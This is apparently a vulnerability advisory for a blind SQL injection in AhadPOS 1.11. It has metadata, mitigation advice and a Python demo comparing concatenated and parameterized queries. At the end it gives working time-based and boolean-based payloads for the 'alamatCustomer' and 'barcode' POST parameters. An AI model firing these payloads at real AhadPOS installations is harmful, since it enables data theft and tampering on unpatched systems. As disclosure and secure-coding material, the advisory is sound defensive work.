Vendor: AhadPOS
By: Cakes
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: AhadPOS
Affected Version From: 1.11
Affected Version To: 1.11
Patch Exists: NO
Related CWE: N/A
CPE: a:rimbalinux:ahadpos:1.11
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: CentOS 7
Year: 2019

rimbalinux AhadPOS 1.11 – ‘alamatCustomer’ SQL Injection

rimbalinux AhadPOS 1.11 is vulnerable to SQL injection through the 'alamatCustomer' and 'barcode' POST parameters. A malicious user can exploit this to disclose sensitive information from the application, modify data, and potentially compromise the application and all its users. The PoC demonstrates two blind SQL injection techniques, time-based and boolean-based, and the payload for each is given below.

Mitigation:

Input validation should be used to prevent SQL injection attacks: all user-supplied input should be validated against its expected format and filtered before it reaches a SQL query. Additionally, queries should be built with parameterized statements (prepared statements with bound values) so that user input is never interpolated into the SQL text.
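As an added example (not part of the advisory or of the AhadPOS code base), the following Python script contrasts a string-concatenated lookup with a parameterized one, running the advisory's boolean-based 'barcode' payload against a constructed in-memory SQLite table; the table and column names and the digits-only barcode rule are assumptions.

```python
import sqlite3

# Constructed stand-in for the product table behind the 'barcode' lookup.
# AhadPOS's real schema is not on the page; table and column names are assumed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE barang (barcode TEXT, nama TEXT, harga INTEGER)")
    conn.executemany(
        "INSERT INTO barang VALUES (?, ?, ?)",
        [("123", "Kopi", 5000), ("456", "Teh", 3000)],
    )
    return conn

def lookup_vulnerable(conn, barcode):
    # Vulnerable pattern: user input is spliced into the SQL text, so a quote
    # followed by OR ... -- rewrites the WHERE clause instead of matching a value.
    sql = "SELECT nama FROM barang WHERE barcode = '" + barcode + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, barcode):
    # Mitigation: the value is bound to a placeholder, so the same payload is
    # compared as a literal string and matches nothing.
    sql = "SELECT nama FROM barang WHERE barcode = ?"
    return [row[0] for row in conn.execute(sql, (barcode,))]

def is_valid_barcode(value):
    # Second layer: allow-list validation before any query runs.
    # The digits-only rule is an assumption about the expected barcode format.
    return value.isdigit() and 1 <= len(value) <= 32

if __name__ == "__main__":
    payload = "-3529' OR 4127=4127-- HRDC"  # boolean-based payload from the advisory
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, payload))        # every product returned
    print("parameterized:", lookup_parameterized(db, payload))  # []
    print("validated:", is_valid_barcode(payload))              # False
```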

Exploit-DB raw data:

# Exploit Title: rimbalinux AhadPOS 1.11 - 'alamatCustomer' SQL Injection
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/rimbalinux/AhadPOS
# Software Link: https://github.com/rimbalinux/AhadPOS.git
# Version: 1.11
# Tested on: CentOS 7
# CVE: N/A

# PoC for time-based and boolean based blind SQL injection

# Parameter: alamatCustomer (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Payload: namaCustomer=test&alamatCustomer=test'||(SELECT 0x4b686f74 FROM DUAL WHERE 8368=8368 AND (SELECT 9520 FROM (SELECT(SLEEP(5)))gtad))||'&telpCustomer=12312345&keterangan=tester

# Parameter: barcode (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause
# Vector: OR [INFERENCE]

Payload: barcode=-3529' OR 4127=4127-- HRDC&jumBarang=1&btnTambah=(t) Tambah
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Payload: barcode=123' AND (SELECT 1256 FROM (SELECT(SLEEP(5)))Nhnk)-- zXsC&jumBarang=1&btnTambah=(t) Tambah